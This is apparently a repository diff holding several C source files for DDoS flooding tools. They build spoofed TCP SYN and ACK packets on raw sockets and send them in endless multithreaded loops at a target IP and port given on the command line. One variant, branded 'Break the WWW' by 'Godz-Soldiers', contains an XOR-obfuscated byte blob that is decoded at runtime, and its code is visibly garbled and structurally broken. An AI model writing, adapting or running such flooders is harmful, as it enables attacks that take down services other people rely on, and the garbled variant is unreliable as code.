||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 2;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 1;
|
||||
tcph->urg_ptr = 1;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,220 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->psh = 1;
|
||||
tcph->ack = 1;
|
||||
tcph->urg = 1;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,288 @@
|
|||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <time.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
char* randip(char* dst);
|
||||
ushort rand16();
|
||||
uint rand32();
|
||||
|
||||
struct thread_data{
|
||||
int throttle;
|
||||
int thread_id;
|
||||
unsigned int floodport;
|
||||
struct sockaddr_in sin;
|
||||
};
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
Q[3] = x + PHI + PHI + i++ + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
|
||||
char *myStrCat (char *s, char *a) {
|
||||
while (*s != '\0') s++;
|
||||
while (*a != '\0') *s++ = *a++;
|
||||
*s = '\0';
|
||||
return s;
|
||||
}
|
||||
|
||||
char *replStr (char *str, size_t count) {
|
||||
if (count == 0) return NULL;
|
||||
char *ret = malloc (strlen (str) * count + count);
|
||||
if (ret == NULL) return NULL;
|
||||
*ret = '\0';
|
||||
char *tmp = myStrCat (ret, str);
|
||||
while (--count > 0) {
|
||||
tmp = myStrCat (tmp, str);
|
||||
}
|
||||
return ret;
|
||||
}
|
||||
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 19150LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
c = x + c;
|
||||
t = c + t;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 6; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
char ip[17];
|
||||
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(rand()%54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr(ip);
|
||||
iph->saddr = inet_addr("1.3.3.7");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(rand()%65535);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res1 = 2;
|
||||
tcph->res2 = 3;
|
||||
tcph->doff = 4;
|
||||
tcph->psh = 5;
|
||||
tcph->syn = 6;
|
||||
tcph->window = htons(rand()%65535);
|
||||
tcph->check = 1;
|
||||
tcph->urg_ptr = 1;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
uint32_t random_num;
|
||||
uint32_t ul_dst;
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(rand()%54321);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(rand()%54321);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
int psh = 0;
|
||||
int res1 = 0;
|
||||
int res2 = 0;
|
||||
while(1)
|
||||
{
|
||||
random_num = rand_cmwc();
|
||||
|
||||
ul_dst = (random_num >> 16 & 0xFF) << 24 |
|
||||
(random_num >> 24 & 0xFF) << 8 |
|
||||
(random_num >> 8 & 0xFF) << 16 |
|
||||
(random_num & 0xFF);
|
||||
|
||||
if(psh > 1) psh = 1;
|
||||
if(res1 > 4) res1 = 0;
|
||||
if(res2 > 3) res2 = 0;
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
tcph->dest = htons(rand()%65535);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->ack_seq = 1;
|
||||
tcph->psh = psh;
|
||||
tcph->res1 = res1;
|
||||
tcph->res2 = res2;
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
psh++;
|
||||
res1++;
|
||||
res2++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (struct tcphdr *)((u_int8_t *)iph + (5 * sizeof(u_int32_t)));
|
||||
struct sockaddr_in sin;
|
||||
char new_ip[sizeof "255.255.255.255"];
|
||||
if(argc < 5){
|
||||
fprintf(stdout, "Break the WWW\nMade by Godz-Soldiers\nUsage: %s [Victim] [Threads] [PPS -1 For no limit] [Time]\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(0));
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
char threads[209] = "\x77\x47\x5E\x27\x7A\x4E\x09\xF7\xC7\xC0\xE6\xF5\x9B\xDC\x23\x6E\x12\x29\x25\x1D\x0A\xEF\xFB\xDE\xB6\xB1\x94\xD6\x7A\x6B\x01\x34\x26\x1D\x56\xA5\xD5\x8C\x91\xBC\x8B\x96\x29\x6D\x4E\x59\x38\x4F\x5C\xF0\xE2\xD1\x9A\xEA\xF8\xD0\x61\x7C\x4B\x57\x2E\x7C\x59\xB7\xA5\x84\x99\xA4\xB3\x8E\xD1\x65\x46\x51\x30\x77\x44\x08\xFA\xD9\x92\xE2\xF0\xC8\xD5\x60\x77\x52\x6D\x21\x02\x1D\xFC\xB3\x80\xB4\xA6\x9D\xD4\x28\x24\x03\x5A\x35\x14\x5B\xA8\xE0\x8A\x9A\xE8\xC0\x91\x6C\x7B\x47\x5E\x6C\x69\x47\xB5\xB4\x89\xDC\xAF\xAA\xC1\x2E\x6A\x04\x10\x6E\x7A\x1C\x0C\xF9\xCC\xC0\xA0\xF8\xC8\xD6\x2E\x0A\x12\x6E\x76\x42\x5A\xA6\xBE\x9F\xA6\xB1\x90\xD7\x24\x64\x15\x1C\x20\x0A\x19\xA8\xF9\xDE\xD1\xBE\x96\x95\x64\x38\x4C\x53\x3C\x40\x56\xD1\xC5\xED\xE8\x90\xB0\xD2\x22\x68\x06\x5B\x38\x33\x00\xF4\xF3\xC6\x96\xE5\xFA\xCA\xD8\x30\x0D\x50\x23\x2E\x45\x52\xF6\x80\x94";
|
||||
int x = 0;
|
||||
int y = 0;
|
||||
for(x =0;x<sizeof(threads)-1;x++){
|
||||
y+=6;
|
||||
threads[x]^=y*3;
|
||||
int i;
|
||||
fprintf(stderr, "Starting sockets...\n", argv[1]);
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Flooding %s\n", argv[1], flood);
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
ushort rand16() {
|
||||
srandom(time(0));
|
||||
srand(random());
|
||||
srandom(rand());
|
||||
return (random() + rand() + time(0)) % 65535;
|
||||
}
|
||||
|
||||
uint rand32() {
|
||||
srandom(time(0));
|
||||
srand(random());
|
||||
srandom(rand());
|
||||
return (random() + rand() & time(0));
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,218 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->ack = 1;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
